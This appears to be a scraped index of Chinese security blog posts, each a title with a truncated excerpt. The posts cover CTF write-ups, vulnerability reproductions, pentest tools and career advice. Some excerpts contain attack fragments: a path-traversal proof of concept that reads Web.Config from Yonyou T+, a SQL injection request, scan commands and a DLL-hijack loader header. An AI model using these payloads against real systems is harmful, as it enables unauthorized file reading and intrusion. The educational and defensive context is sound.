Solidity 小白教程：11. 构造函数和修饰器这一讲，我们将用合约权限控制（Ownable）的例子介绍solidity语言中构造函数（constructor）和独有的修饰器（modifier）。构造函数构造函数&…

Vulnhub：Kira: CTF靶机

kali：192.168.111.111 靶机：192.168.111.238 信息收集端口扫描 nmap -A -sC -v -sV -T5 -p- --scripthttp-enum 192.168.111.238访问80端口点击upload发现是个上传点点击language发现存在文件包含上传php图片马再利用文件包含反弹shell http://1…

利用grafana展示Zabbix数据可视化

导入zabbix数据源，可以直接创建图形了。单击“”按钮，选择创建仪表盘，单击要创建的图形，图形种类有很多，常用的有图表，列表，报警清单，zabbix触发器，文本。创建巡检图形…

【漏洞复现】E-office文件包含漏洞

漏洞描述 Weaver E-Office是中国泛微科技（Weaver）公司的一个协同办公系统。泛微 E-Office 是一款标准化的协同 OA 办公软件，实行通用化产品设计，充分贴合企业管理需求，本着简洁易用、高效智能的原则，为企业快速打造移动化、无纸化、数字化的办公平台。该漏洞是由于存在…

探究SpringWeb对于请求的处理过程

探究目的在路径归一化被提出后，越来越多的未授权漏洞被爆出，而这些未授权多半跟spring自身对路由分发的处理机制有关。今天就来探究一下到底spring处理了什么导致了才导致鉴权被绕过这样严重的问题。 DispatcherServlet介绍首先在分析spring对请求处…

WEB安全：深入反射式dll注入技术

一、前言 dll注入技术是让某个进程主动加载指定的dll的技术。恶意软件为了提高隐蔽性，通常会使用dll注入技术将自身的恶意代码以dll的形式注入高可信进程。常规的dll注入技术使用LoadLibraryA()函数来使被注入进程加载指定的dll。常规dll注入的方式一个致命的缺陷…

【严重】ejs 存在服务端模板注入漏洞（存在POC）

漏洞描述 EJS 是开源的 JavaScript 模板引擎，允许在HTML代码中使用JavaScript代码块，closeDelimiter 参数是 EJS 模板中的结束标记，用于指定结束分隔符。由于对 CVE-2022-29078 漏洞修复不完全，当应用程序使用 EJS 模板引擎&am…

ChatGPT：你真的了解网络安全吗？浅谈网络安全攻击防御进行时之网络安全新定义

ChatGPT：你真的了解网络安全吗？浅谈网络安全攻击防御进行时网络安全新定义 ChatGPT（全名：Chat Generative Pre-trained Transformer），美国OpenAI 研发的聊天机器人程序，是人工智能技术驱动的自…

这才是CSDN最系统的网络安全学习路线（建议收藏）

01 什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域，都有攻与防两面…

XSS - 跨站脚本攻击

一、XSS简介。 XSS跨站脚本（Cross-Site Scripting，XSS）自1996年诞生以来，如今已经历十多年的演化。由于和另一种网页技术-层叠样式表（Cascading Style Sheets，CSS）的缩写一样，为了防…

CTFshow-pwn入门-前置基础pwn20-pwn22

pwn20-pwn22是关于.got节跟.got.plt节的。这3道题的问题描述全是一样的，全都是问.got跟.got.plt是否可写以及他们的地址是什么，然后根据这些信息来拼成flag。那么关于.got和.got.plt的内容非常复杂，这里呢我也不解释了，推荐一个牛…

防火墙NAT策略中各项之间以及策略与策略之间的关系

实验结论将实验结论写在前面方便大家直接查看 1、NAT策略中rule与rule之间的关系为“或”的关系，即多个rule存在时，流量只需要匹配其中一个rule即可，流量会按照匹配的rule规则进行流量转发。（华为华三的防火墙rule是没有ID的&a…

[CTF/网络安全] 攻防世界 simple_js 解题详析

[CTF/网络安全] 攻防世界 simple_js 解题详析代码分析代码漏洞姿势String[fromCharCode]总结题目描述：小宁发现了一个网页，但却一直输不对密码。(Flag格式为 Cyberpeace{xxxxxxxxx} ) 页面源代码： 代码分析 function dechiffre(pass_enc){…

新手要学网络安全应该从哪学起？

写在开篇本人10 年工作经验， 擅长 Web 安全攻防、渗透领域， 在金融领域的安全有丰富的实战经验。从事在线教育 3 年多培养学员过万，讲解清晰透彻，课程干货内容多，辅导学员耐心细致我为啥说自学黑客&网络安全&a…

100道护网面试题大全（附答案）

最近日入1000的护网行动已经开始摇人了， 不少大学生在后台私信我如何参加护网、面试问些什么、有没有护网内推作为一个负责任的博主，收到大家反馈的我，连夜发动钞能力，收集整理了一套护网蓝初面试文档 1. 什么是DDoS攻击&#x…

如何看待现在的网络安全行业？

前言网络安全是一个需要具备专业技术和能力的综合性行业，从业者需要具备扎实的技术功底和批判性思维，不断学习和更新知识，以保证随时能够应对威胁和攻击。在现在的网络安全行业，从业者面临的挑战较多，如恶意代码、…

网络安全的红利还能吃几年？

在我看来这是一个伪命题，因为网络安全的核心和本质是持续对抗，只要威胁持续存在，网络安全的红利就会持续存在！ 对于网络安全新入行的同学们来说，这是一个最坏的时代，因为你只能自己搭环境才能重现那些大牛们…

全网最全最有用的网络安全学习路线！整整一晚上才整理出来！

正文： 废话不多说，先上一张图镇楼，看看网络安全有哪些方向，它们之间有什么关系和区别，各自需要学习哪些东西。在这个圈子技术门类中，工作岗位主要有以下三个方向： 安全研发安全研究&#xff1…

密码学的100个基本概念

密码学的100个基本概念一、密码学历史二、密码学基础三、分组密码四、序列密码五、哈希函数六、公钥密码七、数字签名八、密码协议九、密钥管理十、量子密码密码学专栏较为系统的介绍了从传统密码到现代密码，以及量子密码的相关概念。该专栏主要参考了 Bruce Schn…

10 常见网站安全攻击手段及防御方法

在某种程度上，互联网上的每个网站都容易遭受安全攻击。从人为失误到网络罪犯团伙发起的复杂攻击均在威胁范围之内。网络攻击者最主要的动机是求财。无论你运营的是电子商务项目还是简单的小型商业网站，潜在攻击的风险就在那里。知己知彼百战不殆&…

CVE-2023-32233 Linux kernel

0x01 漏洞介绍近日，研究人员发现了Linux内核的NetFilter框架中的新漏洞（CVE-2023-32233）。该漏洞可被本地用户用于将权限提升为root，并完全控制系统。问题的根源在于tfilter nf_tables是如何处理批处理请求的，经过身…

零基础自学黑客【网络安全】啃完这些足够了

我刚学网络安全，该怎么学？要学哪些东西？有哪些方向？怎么选？ 怎么入门？ 这个 Web 安全学习路线，整体大概半年左右，具体视每个人的情况而定。 （上传一直很模糊&#xff0c…

网络安全之命令执行漏洞复现

0x01 漏洞介绍漏洞等级：严重 Webmin 是功能最强大的基于 Web 的 Unix 系统管理工具。管理员通过浏览器访问 Webmin 的各种管理功能并完成相应的管理动作。在版本 1.997 之前的 Webmin 中存在一个任意命令注入漏洞，触发该漏洞需登录 Webmin。 0x02 漏…

26岁转行网络安全，成功上岸安全开发！

前言我是去年 9 月 22 日才正式学习网络安全的，之前在国营单位工作了 4 年，在长沙一个月工资只有 5000 块，而且看不到任何晋升的希望，如果想要往上走，那背后就一定要有关系才行。而且国营单位的气氛是你干的多了&a…

黑客8款常用工具

1.Nmap 它是网络管理员必用的软件之一，以及用以评估网络系统安全。正如大多数被用于网络安全的工具，nmap 也是不少黑客及骇客（又称脚本小子 ）爱用的工具。系统管理员可以利用nmap来探测工作环境中未经批准使用的服务器&#xff…

安全运营 -- splunk 二次开发 -- 自定义搜索命令

0x00 背景 splunk 有很多功能强大的搜索函数，当官方提供的函数无法满足需求时，就需要自己开发app，场景比如对接第三方api等。 0x01 原理 How custom search commands work https://dev.splunk.com/enterprise/docs/devtools/customsearchcommands/ 0x02 环境准备 1.splu…

某SRC的渗透测试实战

前言因为不甘心被称作会只点鼠标的猴子，所以开始了一次某SRC漏洞挖掘，为期一个多星期。文章有点长，但请耐心看完，记录了完整的SRC漏洞挖掘实战渗透过程因为选择的幸运儿没有对测试范围进行规划，所以此次范围就是…

dvwa靶场通关（三）

第三关：CSRF（跨站请求伪造） csrf跨站请求伪造：是一种对网站的恶意利用。尽管听起来像跨站脚本，但它与xss非常不同，xss利用站点内受信任用户，而csrf则通过伪造来自受信任用户的请求来利用受信任…

权威认可！腾讯云EdgeOne入选Gartner® DDoS缓解方案市场指南

近日，Gartner发布《Market Guide for DDoS Mitigation Solutions》报告，腾讯云EdgeOne入选Gartner DDoS缓解方案市场指南。 “分布式拒绝服务（DDoS）缓解市场包括检测和缓解DDoS攻击并将其作为专用产品提供的供应商。它包括专业供…

vulnstack(红日)内网渗透靶场二: 免杀360拿下域控

前言在我之前的文章vulnstack(一)打靶，我主要依赖Cobalt Strike进行后期渗透测试，这次我计划使用Metasploit框架(MSF)来进行这个阶段的工作。这个靶场与之前的不同之处在于它的WEB服务器安装了360安全卫士。虽然这增加了挑战的难度，但只要我…

以支付宝为例，聊聊Web安全的三个攻防姿势

我们最常见的Web安全攻击有以下几种 XSS 跨站脚本攻击CSRF 跨站请求伪造clickjacking 点击劫持/UI-覆盖攻击下面我们来逐个分析一、XSS 跨站脚本攻击跨站脚本攻击（Cross Site Scripting），为了不和层叠样式表（Cascading Styl…

CVE-2023-33246 Apache RocketMQ RCE

0x01 漏洞介绍 Apache RocketMQ是一款开源的分布式消息和流处理平台，提供了高效、可靠、可扩展的低延迟消息和流数据处理能力，广泛用于异步通信、应用解耦、系统集成以及大数据、实时计算等场景。漏洞的官方描述为当RocketMQ多个组件，包括N…

皮卡丘Unsafe Fileupload

1.不安全的文件上传漏洞概述文件上传功能在web应用系统很常见，比如很多网站注册的时候需要上传头像、上传附件等等。当用户点击上传按钮后，后台会对上传的文件进行判断比如是否是指定的类型、后缀名、大小等等，然后将其按照设计的格式进行…

计算机发展简史

第一代到第四代计算机都是以电子器件的发展更新来划分的，而第五代以后的计算机则是以设计思想的更新来划分。 １ 第一代电子管计算机（1946～1958） （１）硬件逻辑器件：电…

一款红队批量脆弱点搜集工具

功能指纹识别:调用“三米前有香蕉皮“前辈工具，他的工具比finger好用寻找资产中404，403，以及网页中存在的其他薄弱点，以及需要特定路径访问的资产后续会把nuclei加进来目前只有windows可以用使用第一次使用脚本请运行p…

网络安全（黑客工具）

1.Nmap 它是网络管理员必用的软件之一，以及用以评估网络系统安全。正如大多数被用于网络安全的工具，nmap 也是不少黑客及骇客（又称脚本小子 ）爱用的工具。系统管理员可以利用nmap来探测工作环境中未经批准使用的服务器&#xff…

web应用常见7大安全漏洞，浅析产生的原因！

今天整理了关于web前端的干货知识，web应用常见的有哪些安全漏洞呢，这些漏洞产生的原因又是什么呢？这些问题你想过吗？ 1.SQL 注入 SQL 注入就是通过给 web 应用接口传入一些特殊字符，达到欺骗服务器执行恶意的 SQL 命…

用友畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞

1. 漏洞描述用友畅捷通T DownloadProxy.aspx文件存在任意文件读取漏洞，攻击者通过漏洞可以获取服务器上的敏感文件. 2.FOFA app"畅捷通-TPlus" 3.漏洞复现登录页面验证POC /tplus/SM/DTS/DownloadProxy.aspx?preload1&Path../../Web.Confi…

内网安全：Socks 代理 || 本地代理技术.

内网安全：Socks 代理 || 本地代理技术. Socks 代理又称全能代理，就像有很多跳线的转接板，它只是简单地将一端的系统连接到另外一端。支持多种协议，包括http、ftp请求及其它类型的请求。它分socks 4 和socks 5两种类型&#xff0…

自学黑客【网络安全】，一般人我还是劝你算了吧

十多年前还是高中生的时候开始搞安全的，刚开始是看大佬们在群里发黑页觉得很牛逼。然后慢慢开始学，当时还在网上问过IP和ID有什么区别，，， 后来慢慢开始学注入，日到了第一个站，是家卖钢琴的。放…

沙利文头豹研究院发布《2023年腾讯云数据安全能力中心分析报告》

2023年6月15日，分析机构沙利文（Frost & Sullivan）头豹研究院发布《2023年腾讯安全数据安全能力中心分析报告》（下文简称：报告），报告针对腾讯安全在数据安全领域的解决思路、产品、安全体系、…

安全模型中的4个P

引言：在安全模型中，经常会碰到PDR,PPDR，IPDRR，CARTA-PPDR等模型，其中的P，是predict？是prevent？还是protect？还是policy呢？ 一、4P字典意思解释 1、predict&a…

Say0l的安全开发-弱口令扫描工具-My-crack【红队工具】

写在前面终于终于，安全开发也练习一年半了，有时间完善一下项目，写写中间踩过的坑。安全开发的系列全部都会上传至github，欢迎使用和star。工具链接地址 https://github.com/SAY0l/my-crack 预览 My-Crack 工具介绍更适合…

OpenText EnCase Endpoint Security 识别潜在的网络安全威胁并快速消灭威胁

如今，敏感数据丢失和 IT 系统中断是各类组织面临的最大危机。网络攻击频率不断攀升、修复成本日益增加以及响应时间延长都加剧了数据丢失的隐患。 OpenText EnCase Endpoint Security 的高效体现在能够加速检测恶意活动，并在其导致不可挽回的损失或丢失敏…

buuctf crypto 【Dangerous RSA】解题记录

1.打开文件 2.看到e非常小，c和n都很大，应该是低加密指数，上脚本 from gmpy2 import * from Crypto.Util.number import * n0x52d483c27cd806550fbe0e37a61af2e7cf5e0efb723dfc81174c918a27627779b21fa3c851e9e94188eaee3d5cd6f752406a43fbec…

解锁“高级特权” 偷偷用。千万别声张

现在的手机修图软件，功能是越来越强大了。之前需要用到电脑端PS的功能，现在手机上的修图软件就能实现，还是一键处理的傻瓜操作。你离P图大神只差一个APP——「大神批图」，已解锁限制，安装即是VIP。功能非常丰富&…

iisfastchi漏洞复现

1.查看版本 2.在路径中写入 php脚本发现使用不了 3.环境搭建结局打开把限制打开

山石网科国产化入侵防御系统，打造全生命周期的安全防护

随着互联网的普及和网络安全的威胁日益增加，botnet感染成为了企业面临的重要问题之一。botnet是一种由分散的客户端（或肉鸡）组成的网络，这些客户端被植入了bot程序，受控于攻击者。攻击者通过这些客户端的bot程序&#…

在渗透测试中，提权是什么

在渗透测试中，提权是什么在渗透测试中，提权是指攻击者通过利用系统或应用程序中的漏洞或配置错误，从一个低权限用户升级到高权限用户或系统管理员的过程。这允许攻击者获得更多的特权和控制权，以执行更广泛的恶意操作。当攻击…

python DVWA文件上传POC练习

先直接测试POC 抓包 GET /dv/vulnerabilities/sqli/?id1%27unionselect1%2Cmd5%28123%29%23&SubmitSubmit HTTP/1.1Host: 10.9.75.161Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrom…

BUUCTF刷题十一道(09)

文章目录 October 2019 Twice SQL Injection[GYCTF2020]EasyThinking[BJDCTF2020]EzPHP[HFCTF2020]JustEscape(vm2沙箱逃逸)[GXYCTF2019]StrongestMind[GKCTF 2021]easycms[SUCTF 2018]GetShell[b01lers2020]Life on Mars[WMCTF2020]Make PHP Great Again[MRCTF2020]Ezaudit[CS…

CSRF和XSS有什么区别

CSRF是什么？ 跨站请求伪造(Cross Site Request Forgery，CSRF)是一种攻击，它强制浏览器客户端用户在当前对其进行身份验证后的Web 应用程序上执行非本意操作的攻击，攻击的重点在于更改状态的请求，而不是盗取数据&#x…

Web 安全之 Permissions Policy（权限策略）详解

什么是 Permissions Policy（权限策略）？ Permissions Policy 为 web 开发人员提供了明确声明哪些功能可以在网站上使用，哪些功能不能在网站上使用的机制。可以设置一组策略，用于限制站点代码可以访问的 API 或者修改浏…

封神台----为了女神小芳

目录目录前言文章框架 1，题目 2，实验前的准备 3，进入传送门 4,使用Sqlmap对网站进行监测 4.1.检测目标地址是否存在注入点 4.2、检测数据库中的库名 4.3、选择需要爆的库开始爆表名 4.3.1,后面内容的一些注意点: 4.3.2,开始进…

日本SolarView Compact光伏发电测量系统目录遍历漏洞复现(CVE-2023-40924)

日本SolarView Compact光伏发电测量系统目录遍历漏洞复现CVE-2023-40924 一. 系统简介二.漏洞描述三.影响版本四.fofa查询语句五.漏洞复现六.POC&EXP七、修复建议免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或…

Python灰帽编程——初识Python上

1. Python 简介常用安全工具语言示例perljoomscan whatwebrubymetasploit-frameworkpythonsqlmap pocsuite3gogoby 1.1 Python 起源 1.1.1 语言的作者贵铎范罗萨姆（Guido van Rossum）荷兰人于1989 年圣诞节始创了python。大神就是大神&#xff0…

Cookie和Session有什么区别和关系？

在技术面试中，经常被问到“Cookie和Session的区别”，大家都知道一些，Session比Cookie安全，Session是存储在服务器端的，Cookie是存储在客户端的，然而如果让你更详细地说明，恐怕就不怎么清楚了。 …

fastjson（反序列化）漏洞复现

fastjson 1. 漏洞描述 FastJson是Alibaba的一款开源Json解析库，可用于将Java对象转换为其Json表示形式，也可以用于将Json字符串转换为等效的Java对象。近几年来FastJson漏洞层出不穷。RCE漏洞的源头：17年FastJson爆出的1.2.24反序列化漏…

国家网络安全周 | 天空卫士CEO刘霖在《中国网信》杂志发表署名文章

由中共中央网络安全和信息化委员会办公室、中华人民共和国国家互联网信息办公室主管的《中国网信》2023年第9期总第21期，在2023年国家网络安全宣传周开幕式时同期发布。《中国网信》杂志致力于宣传解读中央网络安全和信息化委员会及其办公室的重大决策部署和重点工作…

Jenkins ：添加node权限获取凭据、执行命令

拥有Jenkins agent权限的账号可以对node节点进行操作，通过添加不同的node可以让流水线项目在不同的节点上运行，安装Jenkins的主机默认作为master节点。 1.Jenkins 添加node获取明文凭据通过添加node节点，本地监听ssh认证，选则凭…

红队技术笔记

笔记下载： 红队技术笔记https://mp.weixin.qq.com/s/DqeaXUZYYIYJ8FVtTV07pw

权限提升WIN篇（腾讯云，CS,MSF）

溢出漏洞信息收集操作系统版本ver，systeminfo漏洞补丁信息systeminfo操作系统位数systeminfo杀软防护tasklist /svc网络netstat -ano,ipconfig当前权限whoami 筛选EXP 根据前面的信息收集中的系统版本，位数和补丁情况筛选出合适的EXP 提权根据EX…

利用 SOAR 加快事件响应并加强网络安全

随着攻击面的扩大和攻击变得越来越复杂，与网络攻击者的斗争重担落在了安全运营中心 （SOC） 身上。SOC 可以通过利用安全编排、自动化和响应 （SOAR） 平台来加强组织的安全态势。这一系列兼容的以安全为中心的软件可加快事…

我们如何将机器学习应用到 Positive Technologies 产品中

今天，我们将向您介绍 ML 如何帮助安全专家实现自动化操作并检测网络攻击。首先，我们将分析理论基础，然后用我们工作中的案例加以证明。我们为什么使用 ML 在讨论使用机器学习模型的必要性之前，我们有必要先了解安全工具的工作原…

免杀对抗-DLL劫持免杀

C&Py-DLL劫持-语言-调用加载 1.使用visual studio创建项目 2.将文件名重命名为.c后缀 3.将如下加载器代码生成dll文件加载器代码： #include "pch.h" #include <Windows.h> #include <stdio.h> #include <string.h>#pragma comment…

时空智友企业流程化管控系统文件存在任意文件上传漏洞附POC

、文章目录时空智友企业流程化管控系统文件存在任意文件上传漏洞附POC1. 时空智友企业流程化管控系统文件简介2.漏洞描述3.影响版本4.fofa查询语句5.漏洞复现6.POC&EXP7.整改意见8.往期回顾时空智友企业流程化管控系统文件存在任意文件上传漏洞附POC 免责声明&#…

如何从外网远程控制企业内网电脑?

在企业中，保护公司机密和数据安全是至关重要的。为了确保员工在使用公司电脑时遵守相关规定，许多公司会采取外网监控员工电脑的方法。本文将介绍一些真实有效的方法和具体的操作步骤，以帮助您更好地监控员工电脑。一、什么是外网监控&#x…

http头各字段含义

1、 Accept：告诉WEB服务器自己接受什么介质类型 */* 表示任何类型，type/* 表示该类型下的所有子类型，type/sub-type表示指定类型。 2.、Accept-Charset： 浏览器可以接受的字符编码集 3、Accept-Encoding： 浏览器申明…

亿某通电子文档安全管理系统任意文件上传漏洞 CNVD-2023-59471

目录 1.漏洞概述 2.影响版本 3.漏洞等级 4.漏洞复现 5.Nuclei自动化扫描POC 6.修复建议

记一次CTF入门练习

前言学习CTF有一段时间了，现在做个小小的总结，加深印象。习题下载（只含第一部分） 链接：https://pan.baidu.com/s/1j-_TlAek4Q9IlEwbMWv2GA?pwd47pk 提取码：47pk 正文 1.1、MISC——找到证据解压缩…

网络安全——（黑客）自学

想自学网络安全（黑客技术）首先你得了解什么是网络安全！什么是黑客！！！ 网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队…

为什么网络安全缺口很大，而招聘却很少？学网络安全真的没有前途吗？

2020年我国网络空间安全人才数量缺口超过了140万，就业人数却只有10多万，缺口高达了93%。这里就有人会问了： 1、网络安全行业为什么这么缺人？ 2、明明人才那么稀缺，为什么招聘时招安全的人员却没有那么多呢&#xff1…

web：[极客大挑战 2019]Http

题目点进页面显示为浏览了这个网站的页面发现没有什么提示信息查看源代码发现一个secret.php，点进去访问点进页面显示为不知道是从如图所示的网址来，所以需要抓包修改Referer头为https://Sycsecret.buuoj.cn Referer必须得在Connection上方&#…

操作系统权限提升(二十八)之数据库提权-SQL Server 数据库安装

SQL Server 数据库安装 SQL Server介绍 SQL Server 是Microsoft 公司推出的关系型数据库管理系统。具有使用方便可伸缩性好与相关软件集成程度高等优点，可跨越从运行Microsoft Windows 98 的膝上型电脑到运行Microsoft Windows 2012 的大型多处理器的服务器等多种平台使用。…

【内网穿透】隐蔽通信隧道技术之建立ICMP隧道

一、基础知识 1、概述一般的网络通信、先在两台机器之间建立 TCP 连接，然后进行正常的数据通信。在知道P 地址的情况下、可以直接发送报文:如果不知道 P 地址，就需要将域名解析成P 地址。在实际的网络中、通常会通过各种边界设备、软/硬件防火墙甚至人…

ToBeWritten之攻击者模拟

也许每个人出生的时候都以为这世界都是为他一个人而存在的，当他发现自己错的时候，他便开始长大少走了弯路，也就错过了风景，无论如何，感谢经历转移发布平台通知：将不再在CSDN博客发布新文章，敬…

面经分享 | 某康安全开发工程师

本文由掌控安全学院 - sbhglqy 投稿一、反射型XSS跟DOM型XSS的最大区别 DOM型xss和别的xss最大的区别就是它不经过服务器，仅仅是通过网页本身的JavaScript进行渲染触发的。二、Oracle数据库了解多吗平常用的多的是MySQL数据库，像Oracle数据库也有…

网络安全自学入门：（超详细）从入门到精通学习路线规划，学完即可就业

很多人上来就说想学习黑客，但是连方向都没搞清楚就开始学习，最终也只是会无疾而终！黑客是一个大的概念，里面包含了许多方向，不同的方向需要学习的内容也不一样。算上从学校开始学习，已经在网安这条路上走…

网络安全是一个好的专业吗？高考之后怎么选择？

目录一.始于大学二.一路成长三. 如何学习网络安全学前感言零基础入门尾言本人信息安全专业毕业，在甲方互联网大厂安全部与安全乙方大厂都工作过，有一些经验可以供对安全行业感兴趣的人参考。或许是因为韩商言让更多人知道了CTF&#xff0…

网络安全系统教程+学习路线（自学笔记）

一、什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域，都有攻与防两面…

直击网络安全简史，现阶段提升免疫力是关键 | 产业安全观智库访谈

当下，AIGC、区块链、云计算等新兴技术发展如火如荼，网络安全的内涵与外延也随之出现许多变化，安全攻防也从早期的黑客炫技手段，演变为如今产业发展的底座。过去的20多年，网络安全行业出现了哪些新变化？安全…

网安云新品速递 | 移动应用安全检测服务，为App合规与安全保驾护航

移动应用安全攻击层出不穷近年来，移动应用安全攻击事件频发，衍生出的用户数据安全问题，也逐渐成为用户、社会，乃至整个国家高度重视的问题。立法层面上，数据安全保护不断加强；监管层面上，相关…

MPLS解决BGP的路由黑洞问题

上下游关系 --- 在标签交换中，我们将以数据流动的方向为准，区分上下游关系，数据发出设备处于上游，而接受设备处于下游。 --- 控层流量流动的方向是和数据层流动方向相反，即从下游传递到上游。 --- 上游需要获取下游的标…

为什么说网络安全是IT行业最后的红利？

前言 “没有网络安全就没有国家安全”。当前，网络安全已被提升到国家战略的高度，成为影响国家安全、社会稳定至关重要的因素之一。网络安全行业特点 1、就业薪资非常高，涨薪快 2021年猎聘网发布网络安全行业就业薪资行业最高人均33.77万…

2023年护网常见面试题汇总！看过的都通过面试啦！

时间过得很快，回想起去年的这个时候，我也正在准备秋招，今天的我刚刚结束培训。我的个人情况就读于某双非大学，信息与计算科学（大数据方向，校企合作，一个介于数学与计算机之间的专业&#xf…

618大促将近，零售电商如何打好“安全保卫战”？

互联网高速发展带动电商行业迅速崛起，近年来，随着直播电商等新玩法的兴起，营销大促模式更加丰富、规模日渐壮大，电商行业发展迎来更大机遇。然而，电商快速发展的背后，羊毛党、黑灰产、网络攻击、仿冒流窜等…

Metasploit入门教程（非常详细）从零基础入门到精通，看完这一篇就够了！

通过本篇文章，我们将会学习以下内容： 1、在Windows上安装Metasploit 2、在Linux和MacOS上安装Metasploit 3、在Kali Linux中使用 Metasploit 4、升级Kali Linux 5、使用虚拟化软件构建渗透测试实验环境 6、配置SSH连接 7、使用SSH连接Kali 8、配…

零基础想入门网安行业，看这一篇就够了!!!

由于我之前写了不少网络安全技术相关的故事文章，不少读者朋友知道我是从事网络安全相关的工作，于是经常有人在微信里问我： 我刚入门网络安全，该怎么学？要学哪些东西？有哪些方向？怎么选&#xff…

CENTOS上的网络安全工具（二十六）SPARK+NetSA Security Tools容器化部署(2)

〇、抓包与批量转换cap文件 1. Network Monitor 抓包我们在CENTO OS上的网络安全工具（十七）搭建Cascade的Docker开发环境中捎带脚介绍了以下windows下的抓包软件。大意就是微软又一款不错的抓包分析软件，名曰nmcap，可在Download …

Chamilo 学习管理软件存在命令执行漏洞（CVE-2023-34960）

免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。 1. Chamilo…

自学黑客（网络安全），一般人我劝你还是算了吧（自学网络安全学习路线--第九章 Internet安全协议）【建议收藏】

文章目录一、自学网络安全学习的误区和陷阱二、学习网络安全的一些前期准备三、自学网络安全学习路线一、安全协议概述二、IPSec协议1、概述2、IP封装过程3、IPSec不安全性4、IPSec的功能5、IPSec体系结构6、IPSec的AH7、IPSec的AH8、IPSec的ESP9、IPSec的ESP10、ISAKMP11、IK…

信息收集方法

whois查询可以查询域名注册时填写的注册信息，如注册人、联系方式等在线查询 https://whois.chinaz.com/ https://www.whois.com/ 子域名收集泛解析：搭建网站时，使用号匹配其他所有域名。如.zzz.com。可以解析出所有的域名，ww…

自学黑客（网络安全），一般人我劝你还是算了吧（自学网络安全学习路线--第十一章网络安全技术上）【建议收藏】

文章目录一、自学网络安全学习的误区和陷阱二、学习网络安全的一些前期准备三、自学网络安全学习路线一、网络数据加密1、链路加密2、链路加密优缺点3、端到端加密二、防火墙1、防火墙的功能2、防火墙功能的局限性3、防火墙的分类一、自学网络安全学习的误区和陷阱 1.不要试…

Web安全：文件包含漏洞测试（防止黑客利用此漏洞.）

Web安全：文件包含漏洞测试. 文件包含的漏洞是程序员在开发网站的时候，为了方便自己开发构架，使用了一些包含的函数（比如：php开发语言，include() , include_once() , require_once() 等等 ）&a…

内网安全：横向传递攻击（SMB || WMI 明文或 hash 传递）

内网安全：横向传递攻击. 横向移动就是在拿下对方一台主机后，以拿下的那台主机作为跳板，对内网的其他主机再进行后面渗透，利用既有的资源尝试获取更多的凭据、更高的权限，一步一步拿下更多的主机，进而达到控…

内网隧道代理技术（二）之LCX端口转发

LCX端口转发 LCX介绍 LCX是一款端口转发工具，分为Windows版和Linux版，Linux版本为PortMap。LCX有端口映射和端口转发两大功能，例如当目标的3389端口只对内开放而不对外开放时，可以使用端口映射将3389端口映射到目标的其他端口使…

网络安全（黑客）工具

1.Nmap 它是网络管理员必用的软件之一，以及用以评估网络系统安全。正如大多数被用于网络安全的工具，nmap 也是不少黑客及骇客（又称脚本小子 ）爱用的工具。系统管理员可以利用nmap来探测工作环境中未经批准使用的服务器&#xff…

老外一些比较火爆的论坛

Hack Forums: Hack Forums是目前最为理想的黑客技术学习根据地。该论坛不仅在设计上面向黑客群体，同时也适用于开发人员、博主、游戏开发者、程序员、图形设计师以及网络营销人士。 Evil Zone: Evil Zone是一个专门面向黑客群体的论坛。当然，其中也涉…

【图解SHA1杂凑算法】SHA1杂凑算法的Python实现保姆级教程 | 物联网安全 | 信息安全

系列索引：【图解安全加密算法】加密算法系列索引 Python保姆级实现教程 | 物联网安全 | 信息安全起初写实验时找到的代码大多基于c/c，python可参考的资料很少，所以借着这次实验的机会把自己走过坑分享一下，希望对大家有所帮助&am…

某互联网银行绿色金融背后的“安全秘诀”

随着银保监会出台《银行业保险业绿色金融指引》、人民银行牵头制定《G20转型金融框架》的发布，金融行业正在持续加大对绿色金融支持力度。某互联网银行为了响应号召，采用数字化无纸化办公，线上零接触服务减少大量碳排放，成为国内…

2021安洵杯Misc writeup

忘了发了，来迟了顺便发一下战队的全wp： https://wp.n03tack.top/posts/4906/ Misc 应该算是签到来得早不如来的巧 CyzCC_loves_LOL 小脑洞老考点，理解一下其实是放进百度翻译然后一下看出来了 s D0g3isthepAssword flag for i in …

GFCTF2021 部分WP

只写我做了的 SignIn GFCTF2021 回复GFCTF，得到base64解码即可 GFCTF{W3lc0me_t0_th3_12th_GFCTF}Misc 重生之我在A国当间谍 secret是PDU编码之后的，一句一句的解就行http://www.sendsms.cn/pdu/ 当然这里不是很多，如果是很多的话可以调…

2022年贵州省职业院校技能大赛中职组网络安全赛项规程

2022年贵州省职业院校技能大赛中职组网络安全赛项规程一、赛项名称赛项名称：网络安全赛项归属： 信息技术类二、竞赛目的为检验中职学校网络信息安全人才培养成效，促进网络信息安全专业教学改革，培养大批既满足国家网络…

（自学）黑客技术——网络安全

如果你想自学网络安全，首先你必须了解什么是网络安全！，什么是黑客！！ 1.无论网络、Web、移动、桌面、云等哪个领域，都有攻与防两面性，例如 Web 安全技术，既有 Web 渗透2.也有 Web 防…

模糊测试面面观 | 车载以太网协议DOIP模糊测试实践案例分享

在前期内容中我们了解了模糊测试是如何发现漏洞的，本期我们将以开源网安模糊测试平台（SFuzz）在车联网行业的实践为例，针对车载以太网DOIP协议详细阐释在实际过程的漏洞发掘过程。在开始之前我们先来了解几个名词。车载以太网 …

[vulntarget靶场] vulntarget-c

靶场地址： https://github.com/crow821/vulntarget 拓扑结构信息收集主机发现 netdiscover -r 192.168.111.0/24 -i eth0端口扫描 nmap -A -sC -v -sV -T5 -p- --scripthttp-enum 192.168.111.131访问80端口，发现为Laravel v8.78.1框架 vulmap探测…

bugku YCCMS漏洞

